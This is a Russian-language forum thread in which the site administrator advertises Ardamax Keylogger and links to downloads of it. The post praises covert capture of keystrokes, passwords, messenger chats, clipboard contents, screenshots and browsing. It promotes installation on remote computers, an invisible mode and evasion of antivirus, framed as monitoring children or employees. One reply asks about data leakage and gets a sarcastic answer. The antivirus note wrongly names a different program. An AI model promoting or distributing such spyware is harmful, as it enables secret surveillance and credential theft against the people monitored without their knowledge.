sorus.ucoz.ru
Главная
Вход
Регистрация
Воскресенье, 04.12.2016, 13:07Приветствую Вас Гость | RSS
[Главная · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Форум » Программы » Другие программы » Ardamax Keylogger 4.3.6 (Рус.) (кейлоггер c большим количеством достоинств)
Ardamax Keylogger 4.3.6 (Рус.)
kruksikДата: Понедельник, 02.03.2015, 11:24 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 16020
Статус:
Ardamax Keylogger - кейлоггер c большим количеством достоинств. Позволяет сохранять скриншоты, ввод с клавиатуры (keylogger), буфер обмена, посещенные сйты, переписку в мессенджерах (например ICQ, QiP). Ardamax Keylogger можно поставить на любой удалённый комрьютер и настроить так, чтобы он информировал при вводе паролей. Он сохраняет всю информацию упорядоченной по датам, и вы можете искать сессии, в которых были написаны определенные слова. Это подходящая программа, если вам нужно контролировать компьютер в ваше отсутствие. И в заключение, записанные события могут быть автоматически отправлены на вашу электронную почту, доступ к логгеру клавиатуры защищен паролем.

Дополнительная информация:

Перехват сообщений в ICQ, Yahoo, MSN, QIP и других мессенджерах
Не секрет, что службы мгновенных сообщений пользуются сейчас огромной популярностью. Нередко с их помощью происходит не только личное общение, но и обсуждаются "нехорошие" дела.

Запись информации, введенной с клавиатуры
Редкий компьютер дома или в офисе обходится без клавиатуры. Программа наблюдения записывает слова и фразы на любом языке, а также символы в свою базу данных.

Слежение за содержимым буфера обмена
Большое достоинство программы - возможность скрытого наблюдения даже за, казалось бы, малозначительными операциями. Так вам всегда будет известно содержимое буфера обмена, без которого обычный пользователь в ходе работы на компьютере обойтись просто не может.

Снимки экрана (скриншоты) через заданный промежуток времени
Наблюдение за промежуточными этапами работы на ПК включает и снимки экрана (скриншоты). Вместе с текстовыми "разведданными" они помогают получить полное впечатление о том, что происходит на компьютере, на котором установлена программа. В зависимости от настроек скриншоты могут отображать происходящее на ПК, как через равные промежутки времени, так и при каждом клике мыши.

Мониторинг посещенных сайтов
Вы удивлены, куда уходит ваш трафик? Наблюдение за компьютером поможет вам ответить на этот вопрос. Вы получите подробный отчет обо всех посещаемых пользователем сайтах. Кроме того, список адресов, по которым ваш ребенок выходил в Интернет, легко объяснит, по какой причине вас в очередной раз вызывают в школу. Скрытое наблюдение за посещением сайтов Интернет сделает ясным и то, почему сотрудник вашего предприятия не успел вовремя подготовить ежемесячный отчет.

Видимый/невидимый режим работы
В зависимости от задач, которые вы ставите, программа мониторинга может работать как в видимом, так и в невидимом режиме. В невидимом режиме keylogger не замечают не только сами пользователи, но и установленные на компьютерах антивирусные программы (для этого вы должны добавить Mipko Personal Monitor в исключения)

Windows 2000/2003/XP/Vista/Windows 7/Windows 8 support
Размер: 1,71 МБ
Скачать:
turbobit.net

www.hitfile.net


Как скачать бесплатно с turbobit

 
ALEX_ALEXДата: Понедельник, 02.03.2015, 22:47 | Сообщение # 2
Абитуриент
Группа: Старожилы
Сообщений: 71
Статус:
Смешной наверное вопрос , но есть ли какая ни будь гарантия , что данные полученные при помощи этой программы не уйдут "налево" ?

ALEX
 
kruksikДата: Понедельник, 02.03.2015, 23:27 | Сообщение # 3
Admin
Группа: Администраторы
Сообщений: 16020
Статус:
Цитата ALEX_ALEX ()
Смешной наверное вопрос , но есть ли какая ни будь гарантия , что данные полученные при помощи этой программы не уйдут "налево" ?

а спросите у разработчика, они вам точно "Правду" расскажут


Как скачать бесплатно с turbobit

 
Форум » Программы » Другие программы » Ardamax Keylogger 4.3.6 (Рус.) (кейлоггер c большим количеством достоинств)
Страница 1 из 11
Поиск:


SORUS 2008-2016 | Sitemap